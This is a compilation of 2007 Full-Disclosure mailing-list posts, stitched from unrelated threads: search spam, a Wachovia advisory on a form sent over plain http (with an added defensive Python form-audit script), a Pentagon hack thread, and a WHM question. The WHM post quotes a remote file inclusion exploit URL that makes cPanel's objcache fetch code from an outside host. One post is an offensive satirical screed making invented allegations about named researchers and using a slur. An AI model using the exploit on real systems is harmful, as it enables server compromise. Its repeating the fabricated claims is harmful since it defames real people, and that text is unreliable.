[Full-disclosure] CN spam links in Google and Yahoo
http://news.yahoo.com/s/zd/20070924/tc_zd/215816

I've seen this a lot lately, and I don't see how these sites were allowed. Is there anyone here who can shed some light on this?

Steve

Excerpt:

A reader, Courtney Cox (no relation to the actress), recently pointed out to me that the top results of recent complex Google searches turned out to be inane Chinese sites that were not even parking sites, just an assortment of keywords that somehow got indexed and brought to the top of the results list. After seeing a few of these sites, I have to wonder what's going on. Is it sabotage?

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
Re: [Full-disclosure] Wachovia Bank website sends confidential information
The link now redirects to an HTTPS page

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Bob Toxen
Sent: Tuesday, July 10, 2007 8:20 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] Wachovia Bank website sends confidential information

Wachovia Bank website sends confidential information (social security numbers, phone number, address, etc.) over the Internet without encryption.

Horizon Network Security Security Advisory 07/10/2007
http://VerySecureLinux.com/
Jul 10, 2007

I. BACKGROUND

Wachovia Bank's official web site offers the following URL to allow its customers to change their privacy preferences:

http://www.wachovia.com/privacy

Wachovia also notified its customers by U.S. Mail that they can use that same URL besides. That URL has a link to the following to actually change one's preferences:

http://www.wachovia.com/personal/forms/privacy_optout

Unfortunately, that page appears to be an ordinary HTML form whose filled out data then is transmitted via the post method to an http (not https) URL.

III. ANALYSIS

We inspected the page's source via our Opera browser. (We did not sniff the web traffic so we are not absolutely sure that there is not some hidden encryption method, though there appears to be none.)

IV. DETECTION

It is trivial to inspect the page source or sniff the data to demonstrate the problem. The problem has not been corrected.

V. WORKAROUND

Use a method other than their web site to exercise one's preferences.

VI. VENDOR RESPONSE

The vendor (Wachovia Bank) was notified via their customer service phone number on June 25. We were transferred to web support. The person answering asked us to FAX the details to her and we did so, also on June 25. We explained that we were reporting a severe security problem on their web site. We stated that if we did not hear back from them within 7 days and the problem was not fixed by then that we would post the problem on the Full Disclosure list, following accepted industry practice. To date we have received no response and the problem remains unfixed.

VII. CVE INFORMATION

There is no CVE number.

VIII. DISCLOSURE TIMELINE

06/25/2007 Initial vendor notification
06/25/2007 Vendor requested FAXed details
06/25/2007 Details FAXed to vendor
07/20/2007 No vendor response
07/20/2007 Public disclosure on this Full Disclosure list

IX. CREDIT

This problem was discovered by Bob Toxen, one of our engineers.

X. LEGAL NOTICES

Copyright C 2007 Horizon Network Security. All rights reserved.

Permission is granted for the redistribution of this alert electronically. It may not be edited without the express written consent of Horizon Network Security. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail [EMAIL PROTECTED] for permission.

Disclaimer: The information in the advisory is believed to be accurate at the time of publishing, based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition and waiving of the right to any action against Horizon Network Security or its employees or contractors. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information.

We believe Wachovia Bank is obligated by California's security breach disclosure laws to notify its California customers who may have used this form and the State of California. Other jurisdictions also may have notification requirements.

Bob Toxen, Horizon Network Security
http://www.verysecurelinux.com [Network Linux/Unix Security Consulting]
http://www.realworldlinuxsecurity.com [Our 5* book: Real World Linux Security]

--
No virus found in this incoming message.
Checked by AVG Free Edition.
Version: 7.5.476 / Virus Database: 269.10.2/893 - Release Date: 7/9/2007 5:22 PM
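Added example, not part of the advisory or of either poster's message: the page-source check described under ANALYSIS and DETECTION, automated for site owners auditing their own forms. It resolves each form's action against the page URL (a relative or missing action inherits the page's http scheme) and reports forms that would submit over anything other than https. The host bank.example, the sample markup and the SENSITIVE_HINTS list are constructed assumptions.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Field-name hints for personal data; an assumed list, extend as needed.
SENSITIVE_HINTS = ("ssn", "social", "phone", "address", "account", "password")


class FormAudit(HTMLParser):
    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.forms = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # An empty or missing action submits to the page's own URL.
            action = urljoin(self.page_url, a.get("action") or "")
            self.forms.append({"action": action, "fields": [],
                               "method": (a.get("method") or "get").lower()})
        elif tag in ("input", "select", "textarea") and self.forms:
            if a.get("name"):
                self.forms[-1]["fields"].append(a["name"])


def cleartext_forms(page_url, html):
    """Return findings for forms whose data would not be sent over https."""
    parser = FormAudit(page_url)
    parser.feed(html)
    findings = []
    for form in parser.forms:
        if urlsplit(form["action"]).scheme != "https":
            sensitive = [f for f in form["fields"]
                         if any(h in f.lower() for h in SENSITIVE_HINTS)]
            findings.append({**form, "sensitive": sensitive})
    return findings


# Constructed sample page (not Wachovia's real markup).
SAMPLE_URL = "http://bank.example/personal/forms/privacy_optout"
SAMPLE_HTML = """
<form method="post" action="/cgi-bin/optout">
  <input name="full_name"><input name="ssn"><input name="home_phone">
</form>
<form method="post" action="https://bank.example/login">
  <input name="user"><input name="password" type="password">
</form>
"""

if __name__ == "__main__":
    for f in cleartext_forms(SAMPLE_URL, SAMPLE_HTML):
        print(f["method"].upper(), f["action"], "sensitive:", f["sensitive"])
```

Like the advisory's own check, this only reads markup: a form rewritten by script at submit time, or a server-side redirect to https after the data has already been sent in the clear, needs a look at the actual traffic.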
Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)
Simon,

That happened back in June, even the article is dated June 21. It is funny however, that the person quoted in the transcripts of the press conference said he doesn't use email.

Steve

From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of Simon Smith
Sent: Monday, July 02, 2007 11:07 PM
To: secure poon; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Pentagon Email Servers Hacked (with the URL this time)

Old... As in you have no concept of time because it just came out? Or old.. As in you knew about this before anyone else because you are awesome?

On 7/2/07 10:12 PM, secure poon [EMAIL PROTECTED] wrote:

old news..

On 7/2/07, Simon Smith [EMAIL PROTECTED] wrote:

Oh... And the URL would be helpful. :P

http://www.computerworld.com/action/article.do?command=viewArticleBasic&articleId=9025442&source=NLT_VVR&nlid=37

On 7/2/07 7:20 PM, Simon Smith [EMAIL PROTECTED] wrote:

So they interview a non-technical, non-email using person about a hack on the pentagon?

*scratches head*

SNOsoft Research Team
http://snosoft.blogspot.com
Re: [Full-disclosure] iDEFENSE VCP Challenge and botnet technologies
Wow. What is with all the junk mail over the last few days on the list?

-----Original Message-----
From: [EMAIL PROTECTED] [mailto:[EMAIL PROTECTED]] On Behalf Of [EMAIL PROTECTED]
Sent: Sunday, May 20, 2007 7:16 PM
To: full-disclosure@lists.grok.org.uk
Subject: [Full-disclosure] iDEFENSE VCP Challenge and botnet technologies

Good evening list members,

Here is Larry Seltzer, your beloved on-field journalist reporting about the latest iDEFENSE challenge. An internal source who wishes to remain anonymous, provided information about possible bankruptcy of the VA-based cyberintelligence company, which offers monetary rewards for exploits, vulnerability information (Cross Site Scripting, LD_PRELOAD mis-use and VCP member list leakage issues).

The confidential information shows certain inconsistencies in the financial department, possibly caused by the increasing money laundering crime from eGold and the other payment methods they accept. Anonymous sources comment that the company could be investing in pleasing slave Russian wives since December of past year, with the departure of Richard Johnson and Pedram Amini (working at Microsoft and 3Com's ZDI, respectively). The remaining employees are known to have leaked CANVAS exploits as their own, causing major struggle in the Miami-based basement of the ImmunitySec team (which I hate so much, due to my affiliations with Matasano and some old @Stake people).

This all might be the cause for the low prices offered by the continuous VCP challenges that the company launches on quarterly basis. The current one, offering as much as 16K USD dollars for flaws in OpenSSH, Apache, etc. Security experts from all over the world, consider the price value fair after rumors of potential pre-authentication flaws in the listed applications. Possible reasons include the retirement of GOBBLES Security, the groundbreaking revelations of the well known Dr. Neal Krawetz, the relaunch of SNOSOFT or even the raising of a new neo-luddite terrorist organization known as The Rogue Parrot Squadron, which could be linked to the tsunami disasters and 11th September.

The FBI is reportedly investigating a security compromise of the systems used by the Gibson Research Corporation to host and sponsor the OpenBSD project, after DARPA stopped their funding (due to Theo De Raadt's comments to a Calgary based publication, regarding the War on Terror and gay marriages involving parrot sex and plastic surgery). This could be connected to the aforementioned underground neo-luddite organizations as well as the mysterious Internet identity known as n3td3v or its counterpart, v3dt3n.

In a conference call with Gandhi Evron, details about unsuspected botnets taking over control of Israeli nuclear facilities have been made available. A crack commando lead by Gandhi (who showed up in boxing gloves and elastic pants) managed to destroy an Iranian building complex used to conduct Denial of Service attacks against str0ke's private IRC intelligence service. Other sources confirm the compromise of individuals connected to the kidnapping of the world most well known whitehat expert, Andre Protas, who still works at eEye and obtains IDA Pro bulk licenses (albeit Ilfak Guilfanov publicly refuses to support him) for the now infamous CRACKlab.ru

Similar conditions seem to surround GOBBLES Security operatives, after they were forced out of retirement by the Krawetz HackerFactor gang (in retardement since circa 100 years ago). Anonymous sources agree that this message will be flagged as 'Made in GOBBLES, 100% Mighty Turkey meat' by the well known Doctor. Rumors say he will soon move to a remote, lone Island in the middle of nowhere, to create a new race portraying thick nerdy glasses, fat faces and a desperate need of publishing utterly scientifically-flawed crap in security conferences, forums, blogs and Ranum's podcast.

Finally, Matasano LLC., managed to make a world out of a single Quicktime exploit. This crack commando, known for bashing the LMH/IPU identity (known to be a group of desperate gangsters willing to do real mayhem over whitehats' wifes) arguing they are publicity stunts. Drugs must be working, meds still in pharmacy. Anonymous sources comment that this desperate move for publicity might be a sign of serious financial problems in the consulting firm, which is being managed by a real moron from outer-space, Thomas P-ee-tacek (phonetic emphasis is mine). Known for publishing an IDS evasion paper circa 10 years ago, he possesses strong management skills, as well as a talent for pissing off the wrong people. He also forgot that IDS evasion is more than your own version of 'hping'. They were also stupid enough for getting as much as 10K USD from the ZDI, when they could have sold it to iDEFENSE for a higher value and fingerprinting. The consulting firm denied negotiations with Apple Computer Inc. for a possible Leopard-related contract, which could explain the absolute lameness and faggotry shown in
Re: [Full-disclosure] Overtaking Google Desktop
Oh no!! That would mean he fully disclosed his passwords to full disclosure.

Quick! Yair! Danny! Change your passwords! The evil music has started playing.

-Steve

-----Original Message-----
From: Michal Zalewski [mailto:[EMAIL PROTECTED]]
Sent: Thursday, February 22, 2007 2:25 AM
To: Steve Ragan
Cc: 'Steven Scheffler'; 'pdp (architect)'; 'Yair Amit'; full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Overtaking Google Desktop

On Thu, 22 Feb 2007, Steve Ragan wrote:

Yea he uses it later in the video, you see him pull it up in the attack, and read it. One would assume it is fake.

[lights dim, sinister accords play]

...OR IS IT?

/mz
[Full-disclosure] WHM Exploit question
Is this one of the items patched in the recent update to WHM? I see no info about it anywhere on the web or the Cpanel forums. Is this a new 0-Day and if so does anyone know a security contact for Cpanel? Using the forum, or general address are worthless at times.

Thanks

Steve

Exploit below:

name : web host manager
vendor : cpanel.net
by : s3rv3r_hack3r (ali [at] hackerz [dot] ir)
web-site : www.hackerz.ir - ali.hackerz.ir
exploit: http://domain.com:2086/scripts2/objcache?obj=http://www.hackerz.ir/?